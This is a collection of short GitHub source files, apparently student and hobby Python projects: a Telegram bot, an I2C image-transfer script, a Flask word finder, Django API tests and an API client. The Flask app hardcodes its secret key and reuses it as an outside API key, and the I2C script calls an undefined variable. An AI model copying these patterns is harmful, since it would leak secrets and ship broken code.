line.price\n","repo_name":"Matrixtarget9/Test","sub_path":"refunds/models/package_order.py","file_name":"package_order.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11813349407","text":"import requests, pprint\nfrom decouple import config #파이썬에서 환경변수 관리하는 패키지\n\n#1. 토큰 및 기본 URL 설정\ntoken = config('TELEGRAM_TOKEN')\nurl = f'https://api.telegram.org/bot{token}/'\n\nresponse = requests.get(url+'GETUPDATES').json()\n\nchat_id = response.get('result')[0].get('message').get('from').get('id')\npprint.pprint(chat_id)\n\n#4. CHAT_ID에 메시지 보내기\n #4-1 요청 보낼 URL 만들기\ntext = \"a;lsdkfj;alksdjf\"\napi_url = f'{url}sendMessage?chat_id={chat_id}&text={text}'\nrequests.get(api_url)\n #4-2 REQUESTS 로 보내기","repo_name":"ssshhh0402/telegram","sub_path":"telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"7834957765","text":"from math import *\n\n#Exercise 1\ndef areaCalculation():\n print('Enter length and width:')\n length, width = int(input()), int(input())\n temporary = length * width\n SQFT_PER_ACRE = temporary / 43560\n print(\"Result =\", SQFT_PER_ACRE, \"acres\")\n\n#Exercise 2\ndef freeFall(accseleration=9.8):\n distance = int(input('Enter distance: '))\n Vf = sqrt(2 * (accseleration * distance))\n print('The velocity of an object in contact with the ground: ', Vf)\n\n#Exercise 3\ndef howManyDays():\n month = input('Enter a month: ')\n if month.capitalize() == 'February':\n print('There is 28, or 29 days in', month)\n elif month == 'April' or month == 'June' or month == 'September' or month == 'November':\n print('There is 30 days in', month)\n else:\n print('There is 31 days in', month)\n\n\nareaCalculation()\nprint('---------------------')\nfreeFall()\nprint('---------------------')\nhowManyDays()","repo_name":"MilezKilo/HomeworkOnPythonTwo","sub_path":"TestTwoVar.py","file_name":"TestTwoVar.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"3630463559","text":"#import smbus\nimport time\nimport math\nfrom struct import pack, unpack\n\n#bus = smbus.SMBus(1)\ntime.sleep(1)\n\ndef sendData(slaveAddress, data):\n bus.write_i2c_block_data(slaveAddress, 0xFF,data)\n\ndef readData(slaveAddress,reg):\n bytes=bus.read_i2c_block_data(slaveAddress,reg,16)\n return bytes\n\ndef comando_checksum(offset, level,send_list):\n #comando para pedir checksum\n send_list[0]=5\n #numero de offset\n send_list[1]=(offset & (0xFF<<16))>>16\n send_list[2]=(offset & (0xFF<<8))>>8\n send_list[3]=(offset & (0xFF))\n #nivel\n send_list[4]=(level & (0xFF))\n #llenar cero espacios vacios\n for i in range(5, 13):\n send_list[i]=0\n #checksum\n send_list[13]=sum(send_list[:13])&0xFF\n sendData(0x03,send_list)\n\ndef llenar_comando(cont,send_list):\n #tipo comando(4 para indicar que paquete de la imagen se pide)\n send_list[0]=4\n #llenar cero espacios vacios\n for i in range(4, 13):\n send_list[i]=0\n #numero paquete a pedir\n send_list[1]=(cont & (0xFF<<16))>>16\n send_list[2]=(cont & (0xFF<<8))>>8\n send_list[3]=(cont & (0xFF))\n send_list[13]=sum(send_list[:13])&0xFF\n #regresa el comando listo para enviar\n return send_list\n\ndef skipped_checksum(offset,level,image):\n checksum_list= [0]*15 \n c_i=15*offset #index contenido \n r_i=0 #index result\n separa=(pow(15,level)-1)*15\n size=len(image)\n while True:\n for i in range(15):\n if c_i < size:\n checksum_list[r_i]+=image[c_i]\n checksum_list[r_i]&=0xFF\n c_i+=1\n else:\n return checksum_list\n if r_i >= 14:\n r_i*=0\n else: \n r_i+=1\n c_i+=separa\n \ndef get_skipped_checksum(offset,level,send_list):\n while True:\n #leer checksum de OBC1\n bytes=readData(0x03, 0xFF)\n #calcular checksum\n check_sum=sum(bytes[:15])\n #mantenemos ultimos 8 bits\n check_sum&=0xFF\n #si es igual al inicio de la cadena\n if check_sum==bytes[0]:\n check_sum+=1\n check_sum&=0xFF\n #check sum es correcto?\n if check_sum==bytes[15]:\n return bytes[:15]\n else:\n comando_checksum(offset,level,send_list)\n\n \ndef pedir_foto():\n #condicion termino whiles\n valido=False\n #checksum comandos recibidos\n check_sum=0\n #contador paquetes recibidos \n total=0\n print(\"inicio\")\n #comando pedir foto a OBC2\n send_list= [3] + [1]*12 + [15] \n sendData(0x03,send_list)\n \n while valido== False:\n #leer tamano foto\n bytes=readData(0x03, 0xFF)\n #comprobar si es comando\n if bytes[0]==6:\n #si OBC 2 encontro la foto que pedi\n #1 es si, 0 es no\n if bytes[1]==1:\n #calcula checksum del comando recibido\n check_sum=sum(bytes[:15])&0xFF\n #si checksum es igual a 6\n if check_sum==6:\n check_sum=7\n #comprobar checksum\n if check_sum==bytes[15]:\n #convertir numero de paquetes\n total=math.ceil(((bytes[2]<<24)+(bytes[3]<<16)+(bytes[4]<<8)+(bytes[5]))/15)\n return total\n else:\n sendData(0x03,send_list)\n \nclass Stepper:\n def __init__(self, img_size):\n self.img_size = img_size\n self.cont = 0 #contador paquetes\n self.lectura = 0 #contador lectura \n self.mal_check = 0 #contador checksum incorrecto\n self.image = [0]*(int(img_size)*15) #lista para almacenar los paquetes\n self.send_list = [0 for i in range(14)]\n print(\"total de paquetes: \", img_size)\n\n def next(self):\n if self.cont >= self.img_size:\n print(\"Finito\")\n return False\n llenar_comando(self.cont,self.send_list)\n sendData(0x03,self.send_list)\n #print(\"Pedi: \", self.send_list, self.cont)\n return True\n\n def read(self):\n #leer info de OBC2\n bytes=readData(0x03, 0xFF)\n self.lectura+=1\n #calcular checksum\n check_sum=sum(bytes[:15])\n #aumento el numero de paquete actual\n check_sum+=self.cont\n #mantenemos ultimos 8 bits\n check_sum&=0xFF\n #si es i\n if check_sum==bytes[0]:\n check_sum+=1\n check_sum&=0xFF\n #check sum es correcto?\n if check_sum==bytes[15]:\n #guardar datos para exportar la imagen\n for i in range(15):\n self.image[(self.cont*15)+i]=bytes[i]\n #print(\"Correcto: \", bytes, self.cont)\n self.cont+=1\n else:\n #print(\"Incorrecto: \", bytes, self.cont)\n self.mal_check+=1\n \n def correct_error(self,offset,level):\n print(\"offset: \",offset,\" level: \",level)\n #pedir checksum a OBC1\n comando_checksum(offset,level,self.send_list)\n #separación entre paquetes\n separa=15**(level+1)\n #separación entre paquetes del mismo tipo\n separa2=15**(level+2)\n #calcular checksum paquetes del mismo tipo\n own=skipped_checksum(offset,level,self.image[:self.img_size])\n #leer checksum de OBC1\n other=get_skipped_checksum(offset,level,self.send_list)\n for i in range(15):\n if own[i]!=other[i]:\n if (offset*15)+(i*separa)+separa2 >= len(image):\n #pedir paquete erroneo (offset+i*15**level)\n llenar_comando(offset+i*15**level,self.send_list)\n sendData(0x03,self.send_list)\n while True:\n #leer nuevo paquete\n bytes=readData(0x03, 0xFF)\n #calcular checksum\n check_sum=sum(bytes[:15])\n #mantenemos ultimos 8 bits\n check_sum&=0xFF\n #si es igual al inicio\n if check_sum==bytes[0]:\n check_sum+=1\n check_sum&=0xFF\n #check sum es correcto?\n if check_sum==bytes[15]:\n #guardar datos para exportar la imagen\n for j in range(15):\n self.image[((offset*15)+(i*separa))+j]=bytes[j]\n return\n else: \n sendData(0x03,self.send_list) \n else:\n self.correct_error(offset+i*15**level,level+1)\n return \n\ndef main():\n inicioT=time.time()\n print(\"Recibiendo paquetes...\")\n total = pedir_foto()\n stpr = Stepper(total)\n #stpr.read()\n total_time = 0\n event_count = 0\n min_time = 30\n max_time = 0\n while stpr.next():\n time.sleep(0.001)\n start = time.time()\n stpr.read()\n end = time.time()\n elapsed = end-start\n total_time += elapsed\n event_count += 1\n if elapsed < min_time:\n min_time = elapsed\n if elapsed > max_time:\n max_time = elapsed\n start = time.time()\n stpr.correct_error(0,0)\n end = time.time()\n print(\"tiempo lista checksum imagen:\",end-start)\n print(\"Event stats:\")\n print(\"Event count: {}\".format(event_count))\n print(\"Min time: {} us\".format(1000000*min_time))\n print(\"Max time: {} us\".format(1000000*max_time))\n print(\"Avg. time: {} us\".format(1000000*total_time/event_count))\n\n finT=time.time()\n print(\"fin: \",finT-inicioT)\n print(\"lectura: \",stpr.lectura)\n print(\"mal checksum: \",stpr.mal_check)\n f=open(\"image10.jpg\",\"wb\")\n Aarray=bytearray(stpr.image)\n f.write(Aarray)\n f.close()\n print(\"FIN\")\n \nmain()\n#total = pedir_foto()\n#s = Stepper(total)\n#image =list(open(\"test2.jpg\",\"rb\").read())\n#l = [i&0xFF for i in range(1001)]\n#print(image[:100])\n#print(\"-----------------------\")\n#print(skipped_checksum(0,0,image))\n","repo_name":"OctavioSaul/emulador_OBC1","sub_path":"V2_masterI2C.py","file_name":"V2_masterI2C.py","file_ext":"py","file_size_in_byte":7567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"7760670822","text":"#! /Users/jasonlu/.virtualenvs/pyven3_6/bin/python\n\ndef read_salary():\n\n while True:\n str_file_name = input(\"请输入雇员列表文件名(q或Q退出):\")\n \n if str_file_name is None or str_file_name == '':\n continue \n \n if str_file_name in ['q', 'Q']:\n break \n \n list_employ = []\n try:\n with open(str_file_name, 'r', encoding='utf-8') as f:\n for one_employ in f:\n employ = one_employ.strip()\n if employ != '':\n list_employ.append(employ)\n\n except FileNotFoundError as e:\n print('没有对应的文件...请重新输入文件名')\n\n if len(list_employ) <= 0:\n print('暂时没有员工信息!')\n\n print(len(list_employ))\n print('\\n')\n print('------------------员工支付工资信息表------------------')\n for employ in list_employ:\n print(employ)\n print('-----------------------------------------------------')\n\n\nread_salary()\n","repo_name":"jinzekid/codehub","sub_path":"python/练习_数据结构/c1_9_6.py","file_name":"c1_9_6.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5600329042","text":"from flask import Flask, request, Response, render_template, redirect, flash, url_for\nimport requests\nimport itertools\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nimport wtforms\nfrom wtforms.validators import Regexp\nimport re\n\nclass WordForm(FlaskForm):\n avail_letters = StringField(\"Letters\", validators= [\n Regexp(r'^$|^[a-z]+$', message=\"Must contain only lowercase letters a-z\")\n ])\n \n pattern = StringField(\"Pattern\", validators= [\n Regexp(r'^$|^[a-z|.]+$', message=\"Must contain only lowercase letters a-z or .\")\n ])\n\n length = StringField(\"Length\", validators= [\n Regexp(r'^$|^(3|4|5|6|7|8|9|10)$', message=\"Must contain only one number in range 3-10\")\n ])\n\n submit = SubmitField(\"Search\")\n \n\ncsrf = CSRFProtect()\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = '84247a35-6917-4697-b294-d6cca6cd9052' \ncsrf.init_app(app)\n\n@app.route('/')\ndef default():\n return redirect(url_for('index'))\n\n@app.route('/index')\ndef index():\n form = WordForm()\n return render_template(\"index.html\", form=form)\n\n@app.route('/words', methods=['POST','GET'])\ndef letters_2_words():\n form = WordForm()\n if form.validate_on_submit():\n letters = form.avail_letters.data\n pattern = form.pattern.data\n length = form.length.data\n\n if length != \"\" and pattern != \"\" and len(pattern) != int(length):\n return render_template(\"index.html\", form=form, error=\"Pattern Length and Length must be equal.\")\n elif letters == \"\" and pattern == \"\":\n return render_template(\"index.html\", form=form, error=\"Letters or Pattern must be provided\")\n elif length != \"\" and letters != \"\" and int(length) > len(letters):\n return render_template(\"index.html\", form=form, error=\"Length cannot be greater than number of letters.\")\n else:\n return render_template(\"index.html\", form=form)\n\n good_words = set()\n f = open('sowpods.txt')\n strings = []\n\n if(pattern != \"\"):\n new_pattern = \"^\" + pattern + \"$\"\n for line in f.readlines():\n word = line[:-1]\n if re.search(new_pattern, word):\n strings.append(word)\n else:\n strings = f.readlines()\n \n if length == \"\":\n length = 0\n else:\n length = int(length)\n length += 1\n\n if letters == \"\" and pattern != \"\" and length != \"\" and length != 0:\n length -= 1\n\n if pattern != \"\":\n length = len(pattern)\n\n for x in strings:\n word_length = len(x)\n if(length == 0):\n good_words.add(x.strip().lower())\n elif(length != 0 and length == word_length):\n good_words.add(x.strip().lower())\n f.close()\n word_set = set()\n if(letters != \"\"):\n for l in range(3,len(letters)+1):\n for word in itertools.permutations(letters,l):\n w = \"\".join(word)\n if w in good_words:\n word_set.add(w)\n else:\n word_set = list(good_words)\n \n word_set = sorted(word_set, reverse=False)\n word_set = sorted(word_set, reverse=False, key=len)\n\n message = \"\"\n if len(word_set) == 0:\n message = \"No matching words found.\"\n\n return render_template('wordlist.html',\n wordlist=word_set,\n name=\"CS4131\", message = message)\n\n@app.route('/proxy/')\ndef proxy(word):\n result = requests.get(f'https://www.dictionaryapi.com/api/v3/references/collegiate/json/' + word + '?key=' + app.config[\"SECRET_KEY\"])\n resp = Response(result.text)\n resp.headers['Content-Type'] = 'application/json'\n return resp","repo_name":"pankeelshah/WordFinder","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"41497025872","text":"class Node:\n def __init__(self, s=\"\", val=0, nxt=None, prev=None):\n self.str = s\n self.val = val\n self.next = nxt\n self.prev = prev\n \nclass AllOne:\n def __init__(self):\n self.head = Node(\"\",float(\"inf\"),)\n self.tail = Node(\"\",float(\"-inf\"))\n self.head.next = self.tail\n self.tail.prev = self.head\n self.dic = {}\n \n def inc(self, key: str) -> None:\n if key not in self.dic:\n newNode = Node(key, 1)\n self.createAtTail(newNode, self.tail)\n self.dic[key] = newNode\n else:\n node = self.dic[key]\n node.val +=1\n while node.val > node.prev.val:\n self.swap(node.prev, node)\n \n def dec(self, key: str) -> None:\n node = self.dic[key]\n node.val -=1\n if node.val == 0:\n self.deleteNode(node)\n del self.dic[key]\n elif node.val < node.next.val:\n self.swap(node, node.next)\n \n def getMaxKey(self) -> str:\n return self.head.next.str\n\n def getMinKey(self) -> str:\n return self.tail.prev.str\n \n def createAtTail(self,newNode, tail):\n tail.prev.next = newNode\n newNode.next = tail\n newNode.prev = tail.prev\n tail.prev = newNode\n def createAtHead(self, newNode, head):\n newNode.next = head.next\n newNode.next.prev = newNode\n newNode.prev = head\n head.next = newNode\n def deleteNode(self, node):\n node.prev.next = node.next\n node.next.prev = node.prev\n \n def swap(self, node1, node2):\n node1.prev.next = node2\n node2.next.prev = node1\n node2.prev = node1.prev\n node1.prev = node2\n node1.next = node2.next\n node2.next = node1\n \n \n\n# Your AllOne object will be instantiated and called as such:\n# obj = AllOne()\n# obj.inc(key)\n# obj.dec(key)\n# param_3 = obj.getMaxKey()\n# param_4 = obj.getMinKey()","repo_name":"Matiyas1994/Leetcode","sub_path":"0432-all-oone-data-structure/0432-all-oone-data-structure.py","file_name":"0432-all-oone-data-structure.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"31279776599","text":"\"\"\"\nTests for CRUD operations on views for the Topic model\nwith proper authentication and validation are written here.\n\"\"\"\nimport random\nimport typing\n\nfrom faker import Faker\n\nfrom django.shortcuts import reverse\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom rest_framework.response import Response\n\nfrom backend import utils as u\nfrom topic.models import Topic\nfrom author.models import Author\nfrom author.utils import auth_header\nfrom topic.tests.generators import create_topic\nfrom author.tests.generators import create_author\nfrom article.tests.generators import create_article\nfrom article.serializers import ArticleListSerializer\nfrom topic.serializers import (\n TopicListSerializer,\n TopicDetailSerializer\n)\n\nfake = Faker()\nBASE_URL = '/api/topics'\n\n\nclass TopicRetrieveAPIViewTest(APITestCase):\n \"\"\"\n All views dealing with data retrieval regarding the\n Topic model are tested here. This includes topic lists,\n detail view, etc. Test data of 25 topics is chosen.\n An Author model instance is also conducted for aid in\n creations of said 25 topics.\n \"\"\"\n\n @classmethod\n def setUpTestData(cls) -> None:\n\n # Create authors.\n cls.author: Author = create_author()\n\n # Create topics.\n cls.topics: typing.List[Topic] = list(reversed([\n create_topic(cls.author.id) for _ in range(25)\n ]))\n\n # For later testing.\n cls.topic_1: Topic = random.choice(cls.topics)\n cls.topic_2: Topic = random.choice(cls.topics)\n\n kwargs = {'draft': False, 'author_id': cls.author.id}\n\n cls.articles_for_topic_1 = [create_article(topic_id=cls.topic_1.id, **kwargs) for _ in range(5)]\n cls.articles_for_topic_2 = [create_article(topic_id=cls.topic_2.id, **kwargs) for _ in range(5)]\n\n def test_topic_list_paginated(self) -> None:\n \"\"\"\n Makes a request to /api/topics/ and checks for topics being\n properly paginated and in proper format.\n \"\"\"\n page = 1\n for topic_index in range(0, 25, 10):\n response: Response = self.client.get(f'{reverse(\"topic:list\")}?page={page}')\n data = u.get_json(response)\n results = data['results']\n\n current_page_topics = self.topics[topic_index:topic_index+10]\n serialized_current_page_topics = TopicListSerializer(current_page_topics, many=True).data\n\n self.assertEqual(results, serialized_current_page_topics)\n page += 1\n\n def test_topic_detail_view(self) -> None:\n \"\"\"\n Simply makes requests to all reverse urls for topic details\n and compares serialized data against them.\n \"\"\"\n\n for topic in self.topics:\n response: Response = self.client.get(topic.get_absolute_url())\n data = u.get_json(response)\n serialized_data = TopicDetailSerializer(topic).data\n self.assertEqual(data, serialized_data)\n\n def test_topic_sorted_articles_view(self) -> None:\n \"\"\"\n Makes a GET request to /api/topics/detail//articles/ to get\n a list of articles written under the topic queried from .\n \"\"\"\n # Create articles to populate the database.\n\n for topic_id in (1, 2):\n\n # Get data - both serialized and in ORM form.\n topic = getattr(self, f'topic_{topic_id}')\n articles = getattr(self, f'articles_for_topic_{topic_id}')\n articles_serialized_data = list(reversed(ArticleListSerializer(articles, many=True).data))\n\n # Make request.\n response = self.client.get(reverse('topic:articles', kwargs={'slug': topic.slug}))\n data = u.get_json(response)\n\n # Assert equality.\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(data.get('results'), articles_serialized_data)\n\n\nclass TopicCreationAPIViewTest(APITestCase):\n \"\"\"\n Tests the TopicCreateAPIView with various invalid inputs (and valid).\n \"\"\"\n\n @classmethod\n def setUpTestData(cls) -> None:\n \"\"\"\n Make a temporary author to check make authenticated responses with.\n \"\"\"\n cls.author = create_author()\n cls.data = {\n 'name': fake.text(45)[:-1],\n 'description': fake.text(150),\n 'thumbnail_url': 'https://picsum.photos/id/271/1900/1080',\n }\n\n def test_unauthenticated_topic_creation(self):\n \"\"\"\n Makes an unauthenticated request to /api/topics/create/ to \n (hopefully) raise Unauthorized error.\n \"\"\"\n response: Response = self.client.post(reverse('topic:create'))\n data = u.get_json(response)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n self.assertEqual(data, {'detail': 'Authentication credentials were not provided.'})\n\n def test_authenticated_topic_creation_with_incomplete_data(self):\n \"\"\"\n Makes a properly authenticated request to /api/topics/create/ but\n with invalid (read: incomplete) data that should result in error.\n \"\"\"\n\n self.client.credentials(HTTP_AUTHORIZATION=auth_header(self.author.get_key()))\n\n for field in self.data.keys():\n\n # Make a copy of the data so that\n # the original isn't changed because\n # every iteration will remove one\n # field - going through all.\n temp_data = self.data.copy()\n del temp_data[field]\n\n response: Response = self.client.post(reverse('topic:create'), data=temp_data)\n response_data = u.get_json(response)\n\n self.assertEqual(response.status_code, status.HTTP_422_UNPROCESSABLE_ENTITY)\n\n # Special case for thumbnail_url field since the\n # view (and Topic model) either expects a FILE\n # upload or an image url. For testing purposes,\n # we only work with placeholder image urls.\n if field == 'thumbnail_url':\n self.assertEqual(response_data, {\n 'detail': 'Either provide a url for a thumbnail or an image upload.'\n })\n else:\n self.assertEqual(response_data, {\n 'detail': f\"Field '{field}' not provided.\"\n })\n\n def test_authenticated_topic_creation(self):\n \"\"\"\n Makes a valid request to /api/topics/create/ with proper auth creds\n and valid (read: complete) POST data.\n \"\"\"\n\n # Authenticate via header token\n self.client.credentials(HTTP_AUTHORIZATION=auth_header(self.author.get_key()))\n\n response: Response = self.client.post(reverse('topic:create'), data=self.data)\n data = u.get_json(response)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n # Assert response with serialized last entry in Topic table\n self.assertEqual(data, TopicDetailSerializer(\n Topic.objects.last()\n ).data)\n\n\nclass TopicDeletionAPIViewTest(APITestCase):\n\n @classmethod\n def setUpTestData(cls) -> None:\n\n cls.authors: typing.List[typing.Tuple[int, Author]] = [\n (index, create_author()) for index in range(1, 3)\n ]\n\n # Create 4 topics, 2 by each author.\n cls.author_1_topics: typing.List[Topic] = [\n create_topic(cls.authors[0][1].pk) for _ in range(2)\n ]\n cls.author_2_topics: typing.List[Topic] = [\n create_topic(cls.authors[1][1].pk) for _ in range(2)\n ]\n cls.topics: typing.Set[Topic] = set(cls.author_1_topics + cls.author_2_topics)\n\n def test_unauthenticated_deletion(self):\n \"\"\"\n Make unauthenticated request to /api/topics/delete// to\n assert Unauthorized Error and apt response.\n \"\"\"\n\n response: Response = self.client.delete(reverse('topic:delete', kwargs={\n 'slug': random.choice(self.author_1_topics).slug\n }))\n data = u.get_json(response)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n self.assertEqual(data, {'detail': 'Authentication credentials were not provided.'})\n\n def test_invalid_permission_topic_deletion(self):\n \"\"\"\n Make valid authorized delete requests to /api/topics/delete//\n to raise a Forbidden error with apt response.\n \"\"\"\n\n for index, author in self.authors:\n\n # Authenticate delete request with current author\n self.client.credentials(HTTP_AUTHORIZATION=auth_header(author.get_key()))\n\n topics_not_by_author = self.topics.difference(getattr(self, f'author_{index}_topics'))\n\n for topic in topics_not_by_author:\n response: Response = self.client.delete(reverse('topic:delete', kwargs={\n 'slug': topic.slug\n }))\n data = u.get_json(response)\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n self.assertEqual(data, {'detail': 'Deletion is not authorized.'})\n\n def test_valid_permission_topic_deletion(self):\n \"\"\"\n Last test to run in this APITestCase - makes valid delete requests\n /api/topics/delete// and compares status code and check\n for existence inside of database.\n \"\"\"\n\n for index, author in self.authors:\n\n self.client.credentials(HTTP_AUTHORIZATION=auth_header(author.get_key()))\n topics_by_author = getattr(self, f'author_{index}_topics')\n\n for topic in topics_by_author:\n\n topic_slug = topic.slug\n\n response: Response = self.client.delete(reverse('topic:delete', kwargs={\n 'slug': topic_slug\n }))\n # No need to get data since a 204 response doesn't return anything.\n\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n # Now check for data.\n with self.assertRaises(ObjectDoesNotExist):\n Topic.objects.get(slug__iexact=topic_slug)\n","repo_name":"mentix02/medialist-backend","sub_path":"topic/tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"10759512316","text":"#\n# Henry Acevedo\n#\n# Purpose: Log courses that are published and not for data visualization purposes.\n#\n\nimport csv\nfrom canvasapi import Canvas\nfrom configparser import ConfigParser\n\nconfig = ConfigParser()\nconfig.read('config.ini')\nMYURL = config.get('instance', 'test')\nMYTOKEN = config.get('auth', 'token')\n\ncanvas = Canvas(MYURL, MYTOKEN)\n\n# Specify information for term and filename\n\n# Fall 18\n# fn = 'SubaccountsPublish.csv'\n# term_id = 27\n\n# Winter 19\n# fn = '2191SubaccountsPublish.csv'\n# term_id = 28\n\n# Spring 19\nfn = '2193SubaccountsPublish.csv'\nterm_id = 29\n\n\ndef main():\n # Academic courses subaccount\n root = canvas.get_account(10)\n accounts = root.get_subaccounts()\n\n # Create a .csv with filename from above and write heare\n with open(fn, 'w') as csvFile:\n csvWriter = csv.writer(csvFile, lineterminator='\\n')\n csvWriter.writerow(['account', 'Parent', 'Course', 'Status'])\n\n # Cycle through subaccounts in this account\n for account in accounts:\n # Get courses in term with a teacher, and include number of students in course\n courses = account.get_courses(\n enrollment_type=['teacher'],\n enrollment_term_id=term_id,\n include=['total_students'])\n\n # Cycle through courses\n for course in courses:\n # If no students ignore, otherwise log in csv as published or unpublished\n if course.total_students != 0:\n if course.workflow_state == 'unpublished':\n csvWriter.writerow([\n account.name,\n course.account_id,\n course.id, 'Unpublished'])\n else:\n csvWriter.writerow([\n account.name,\n course.account_id,\n course.id, 'Published'])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HenryAcevedo/canvas-scripts","sub_path":"scripts/get-published-courses.py","file_name":"get-published-courses.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40053200660","text":"import requests\nfrom flight_data import FlightData\nfrom decouple import config\n\nTEQUILA_KIWI_TRAVEL_API_KEY = config(\"TEQUILA_KIWI_TRAVEL_API_KEY\", default=\"\")\nTEQUILA_FLIGHT_SEARCH_ENDPOINT = config(\"TEQUILA_FLIGHT_SEARCH_ENDPOINT\", default=\"\")\nTEQUILA_LOCATION_QUERY = config(\"TEQUILA_LOCATION_QUERY\", default=\"\")\ntequila_headers = {\n \"apikey\": TEQUILA_KIWI_TRAVEL_API_KEY\n}\n\n\nclass FlightSearch:\n # This class is responsible for talking to the Flight Search API.\n def __init__(self):\n self.iata_code = None\n\n def get_iata_code(self, city: str):\n parameters = {\n \"term\": city,\n \"location_types\": \"city\"\n }\n get_iata_code_response = requests.get(TEQUILA_LOCATION_QUERY, headers=tequila_headers,\n params=parameters)\n get_iata_code_response.raise_for_status()\n self.iata_code = get_iata_code_response.json()[\"locations\"][0][\"code\"]\n return self.iata_code\n\n def get_destination_city_and_price(self, destination_city_code: str, source_city_code: str, from_date: str,\n to_date: str, destination_city: str):\n parameters = {\n \"fly_from\": source_city_code,\n \"fly_to\": destination_city_code,\n \"dateFrom\": from_date,\n \"dateTo\": to_date,\n \"nights_in_dst_from\": 7,\n \"nights_in_dst_to\": 28,\n \"flight_type\": \"round\",\n \"one_for_city\": 1,\n \"max_stopovers\": 0,\n \"curr\": \"GBP\"\n }\n response = requests.get(TEQUILA_FLIGHT_SEARCH_ENDPOINT, params=parameters, headers=tequila_headers)\n response.raise_for_status()\n\n try:\n data = response.json()[\"data\"][0]\n except IndexError:\n print(f\"No flights found for {destination_city_code}.\")\n parameters[\"max_stopovers\"] = 1\n response = requests.get(TEQUILA_FLIGHT_SEARCH_ENDPOINT, params=parameters, headers=tequila_headers)\n response.raise_for_status()\n try:\n data = response.json()[\"data\"][0]\n print(data)\n except IndexError:\n print(f\"No flights found for {destination_city_code} with 1 stop over.\")\n return None\n\n flight_data = FlightData(\n price=data[\"price\"],\n origin_city=data[\"route\"][0][\"cityFrom\"],\n origin_airport=data[\"route\"][0][\"flyFrom\"],\n destination_city=destination_city,\n destination_airport=data[\"route\"][0][\"flyTo\"],\n out_date=data[\"route\"][0][\"local_departure\"].split(\"T\")[0],\n return_date=data[\"route\"][1][\"local_departure\"].split(\"T\")[0]\n )\n\n if parameters[\"max_stopovers\"] >= 1:\n flight_data.via_city = data[\"route\"][0][\"cityTo\"]\n flight_data.stop_overs = parameters[\"max_stopovers\"]\n\n print(f\"{flight_data.destination_city}: £{flight_data.price}\")\n return flight_data\n","repo_name":"sign4git/nandalal","sub_path":"Python/Flight Deals/flight_search.py","file_name":"flight_search.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"41918325604","text":"import time\nfrom functools import wraps\nfrom exporter import config\n\n\ndef retry(exceptions, tries=4, delay=3, backoff=2, logger=None):\n def deco_retry(f):\n @wraps(f)\n def f_retry(*args, **kwargs):\n mtries, mdelay = tries, delay\n while mtries > 1:\n try:\n return f(*args, **kwargs)\n except exceptions as e:\n msg = \"{}, Retrying in {} seconds...\".format(e, mdelay)\n if logger:\n logger.warning(msg)\n else:\n print(msg)\n time.sleep(mdelay)\n mtries -= 1\n mdelay *= backoff\n return f(*args, **kwargs)\n\n return f_retry\n\n return deco_retry\n\n\ndef catch_task_error(name, logger):\n def catch(func):\n def wrapper(*args, **kwargs):\n logger.info(\"{} task\".format(name))\n try:\n func(*args, **kwargs)\n except Exception as e:\n if logger:\n logger.error(\"{} task failed\".format(name))\n logger.error(e)\n print(e)\n if config.DEBUG:\n raise e\n return wrapper\n return catch\n","repo_name":"freeletics/ASO-collector","sub_path":"exporter/utils/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
